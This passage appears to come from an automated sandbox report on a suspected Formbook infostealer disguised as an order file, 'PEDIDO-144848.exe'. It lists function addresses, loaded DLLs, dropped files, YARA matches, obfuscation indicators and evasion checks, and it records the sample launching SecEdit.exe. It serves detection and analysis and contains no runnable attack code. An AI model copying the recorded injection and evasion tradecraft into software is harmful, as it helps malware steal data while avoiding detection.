        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC78F32_2_36CC78F3
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C268822_2_36C26882
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C898B22_2_36C898B2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C198702_2_36C19870
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2B8702_2_36C2B870
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCF8722_2_36CCF872
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C138002_2_36C13800
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E8102_2_36C3E810
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF68682_2_36BF6868
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CB08352_2_36CB0835
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C559C02_2_36C559C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0E9A02_2_36C0E9A0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCE9A62_2_36CCE9A6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690E69D2_2_3690E69D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690D7082_2_3690D708
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690E46D2_2_3690E46D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690E3072_2_3690E307
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690C9B82_2_3690C9B8
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_369151E42_2_369151E4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_3690E1E82_2_3690E1E8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307E3104_2_0307E310
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312F3304_2_0312F330
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030613804_2_03061380
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312124C4_2_0312124C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0305D2EC4_2_0305D2EC
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0305F1134_2_0305F113
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0313010E4_2_0313010E
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0310D1304_2_0310D130
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030B717A4_2_030B717A
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030751C04_2_030751C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308B1E04_2_0308B1E0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0311E0764_2_0311E076
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A508C4_2_030A508C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030600A04_2_030600A0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307B0D04_2_0307B0D0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031270F14_2_031270F1
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031267574_2_03126757
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030727604_2_03072760
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307A7604_2_0307A760
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308C6004_2_0308C600
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0310D62C4_2_0310D62C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0311D6464_2_0311D646
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030946704_2_03094670
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030706804_2_03070680
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312A6C04_2_0312A6C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030E36EC4_2_030E36EC
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312F6F64_2_0312F6F6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0306C6E04_2_0306C6E0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0313A5264_2_0313A526
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031275C64_2_031275C6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312F5C94_2_0312F5C9
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030704454_2_03070445
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030DD4804_2_030DD480
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030ADB194_2_030ADB19
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03070B104_2_03070B10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312FB2E4_2_0312FB2E
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030E4BC04_2_030E4BC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312CA134_2_0312CA13
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312EA5B4_2_0312EA5B
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312FA894_2_0312FA89
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308FAA04_2_0308FAA0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0306E9A04_2_0306E9A0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312E9A64_2_0312E9A6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030B59C04_2_030B59C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030738004_2_03073800
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0309E8104_2_0309E810
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031108354_2_03110835
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312F8724_2_0312F872
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030568684_2_03056868
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030798704_2_03079870
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308B8704_2_0308B870
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030E58704_2_030E5870
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030868824_2_03086882
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030E98B24_2_030E98B2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030728C04_2_030728C0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031218DA4_2_031218DA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_031278F34_2_031278F3
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307CF004_2_0307CF00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312FF634_2_0312FF63
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312EFBF4_2_0312EFBF
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03121FC64_2_03121FC6
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03076FE04_2_03076FE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030B2E484_2_030B2E48
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03090E504_2_03090E50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03110E6D4_2_03110E6D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03071EB24_2_03071EB2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03120EAD4_2_03120EAD
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03129ED24_2_03129ED2
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03062EE84_2_03062EE8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0306AD004_2_0306AD00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312FD274_2_0312FD27
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03127D4C4_2_03127D4C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03070D694_2_03070D69
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03082DB04_2_03082DB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03079DD04_2_03079DD0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0310FDF44_2_0310FDF4
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03060C124_2_03060C12
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0307AC204_2_0307AC20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0311EC4C4_2_0311EC4C
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03073C604_2_03073C60
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0312EC604_2_0312EC60
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03126C694_2_03126C69
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03109C984_2_03109C98
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_03088CDF4_2_03088CDF
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030F7CE84_2_030F7CE8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0308FCE04_2_0308FCE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_0313ACEB4_2_0313ACEB
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDEEBA4_2_02EDEEBA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDE3074_2_02EDE307
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDE1E84_2_02EDE1E8
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDC9B34_2_02EDC9B3
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDE69D4_2_02EDE69D
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDD7084_2_02EDD708
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDE46D4_2_02EDE46D
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: String function: 030DE692 appears 86 times
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: String function: 030EEF10 appears 105 times
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: String function: 030B7BE4 appears 96 times
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: String function: 0305B910 appears 268 times
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: String function: 030A5050 appears 36 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: String function: 36C7E692 appears 84 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: String function: 36C8EF10 appears 105 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: String function: 36C45050 appears 36 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: String function: 36C57BE4 appears 88 times
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: String function: 36BFB910 appears 254 times
        Source: PEDIDO-144848.exe Static PE information: invalid certificate
        Source: PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003699F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036B51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSeCEditj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036EA0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PEDIDO-144848.exe
        Source: PEDIDO-144848.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine Classification label: mal96.troj.evad.winEXE@5/7@2/2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_00403180 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403180
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_004043C3 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043C3
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_004020CD LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk, 0_2_004020CD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe File created: C:\Program Files (x86)\Fljtenists.ini
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe File created: C:\Users\user\slavelivets
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe File created: C:\Users\user\AppData\Local\Temp\nsu7B62.tmp
        Source: PEDIDO-144848.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: PEDIDO-144848.exe ReversingLabs: Detection: 23%
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe File read: C:\Users\user\Desktop\PEDIDO-144848.exe
        Source: unknown Process created: C:\Users\user\Desktop\PEDIDO-144848.exe "C:\Users\user\Desktop\PEDIDO-144848.exe"
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Process created: C:\Users\user\Desktop\PEDIDO-144848.exe "C:\Users\user\Desktop\PEDIDO-144848.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: dpapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Section loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\SecEdit.exe Section loaded: scecli.dll
        Source: C:\Windows\SysWOW64\SecEdit.exe Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\SecEdit.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe File written: C:\Program Files (x86)\Fljtenists.ini
        Source: PEDIDO-144848.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: SecEdit.pdb source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: SecEdit.pdbGCTL source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036A24000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003687C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PEDIDO-144848.exe, PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036A24000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003687C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe
        Source: Binary string: mshtml.pdbUGP source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmp

        Data Obfuscation

        Source: Yara match File source: 00000002.00000002.115544134516.00000000017B8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000002.115152353454.0000000002ED8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36C008CD push ecx; mov dword ptr [esp], ecx 2_2_36C008D6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36903E36 push edi; ret 2_2_36903E38
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36910637 push esp; retf 2_2_369105D9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36904657 push ecx; ret 2_2_36904674
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36904643 push ecx; ret 2_2_36904674
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36904407 pushfd ; ret 2_2_36904408
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36900DB3 push ebx; iretd 2_2_36900DB4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_369105A8 push esp; retf 2_2_369105D9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36900DD3 push ds; ret 2_2_36900DD4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36904AD6 push esp; retf 2_2_36904AAD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36904A18 push esp; retf 2_2_36904AAD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_369103DF push es; iretd 2_2_369103E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_3690C8AA push esi; iretd 2_2_3690C8AD
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36915032 push eax; ret 2_2_36915034
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_369151E4 push eax; retf 0000h 2_2_369156A5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36910963 push eax; retf 2_2_36910968
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_030608CD push ecx; mov dword ptr [esp], ecx 4_2_030608D6
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02ED4AD6 push esp; retf 4_2_02ED4AAD
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02EDB2B8 push edi; retf 42F6h 4_2_02EDB325
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02ED4A0A push esp; retf 4_2_02ED4AAD
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02EDC8AA push esi; iretd 4_2_02EDC8AD
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02EDB89A pushfd ; ret 4_2_02EDB8B2
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02EDB828 pushfd ; ret 4_2_02EDB8B2
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02EE5032 push eax; ret 4_2_02EE5034
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02ED4643 push ecx; ret 4_2_02ED4674
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02ED4657 push ecx; ret 4_2_02ED4674
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02ED3E36 push edi; ret 4_2_02ED3E38
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02ED4407 pushfd ; ret 4_2_02ED4408
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02ED0DD3 push ds; ret 4_2_02ED0DD4
        Source: C:\Windows\SysWOW64\SecEdit.exe Code function: 4_2_02ED0DB3 push ebx; iretd 4_2_02ED0DB4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe File created: C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\SecEdit.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C41763 rdtsc 2_2_36C41763
        Source: C:\Windows\SysWOW64\SecEdit.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\SecEdit.exeAPI coverage: 1.1 %
